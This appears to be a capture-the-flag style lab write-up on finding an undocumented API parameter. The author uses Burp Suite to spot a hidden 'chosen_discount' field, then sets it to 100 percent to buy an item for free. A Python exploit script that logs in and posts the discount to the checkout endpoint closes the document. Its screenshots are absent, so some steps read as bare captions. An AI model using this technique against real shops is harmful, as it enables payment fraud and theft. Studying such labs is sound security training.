3. Finding and exploiting an unused API endpoint

Lets open the vulnerable lab:

Lets sign in if we want:

Now lets navigate through the website, to crawl some pages and functionalities:

After logging in again:

Lets move on to burpsuite to see the history:

We found a get request with these object fields, or paramters, that are not presented in the next image which are the post parameters:

And a post request with some parameters:

Lets send it to the repeater, and see if we can change the item price so we can buy it:

So we have to set a number:

And as a string:

It works correctly with numbers but maybe there is some validation because the price did not change if we change the request to GET:

But we have something else in the hidden parameters, we have a chosen_discount parameter, lets try to exploit it:

Here we go if we add it it does not occur an error.

Lets try use a string:

Here we have an error:

And here we go:

Here is the vulnerability, where we got a hidden parameter, and then send it with a string and a number for example, and it errors with a string but with a number it works perfectly, so we can abuse it and set the discount to 100 to get it for free.

We solved the lab:

Solve it using a python3 script:

import requests  
import re  
import os  
import sys  
  
proxies = {  
    "http": "http://127.0.0.1:8080",  
    "https": "http://127.0.0.1:8080"  
}  
  
session = requests.session()  
  
  
def Login(username, password):  
    print("[*] Get CSRF Token.")  
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text)  
    print("[*] Logging In.")  
    data = f"csrf={csrf[0]}&username={username}&password={password}"  
    session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)  
  
  
def Discount():  
    print("[*] Change The Discount To 100.")  
    data = {  
        "chosen_discount": {  
            "percentage": 100  
        },  
        "chosen_products": [  
            {  
                "product_id": "1",  
                "quantity": 1  
            }  
        ]  
    }  
    session.post(url=url + "api/checkout", json=data, proxies=proxies, verify=False)  
  
  
if __name__ == "__main__":  
    if len(sys.argv) != 2:  
        script_name = os.path.basename(__file__)  
        print(f"[-] Usage: python {script_name} http://localhost/")  
        sys.exit(1)  
    url = sys.argv[1]  
    Login("wiener", "peter")  
    Discount()  
    print("[+] Solved.")

Previous2. Exploiting server-side parameter pollution in a query string Next4. Exploiting a mass assignment vulnerability

Last updated 1 month ago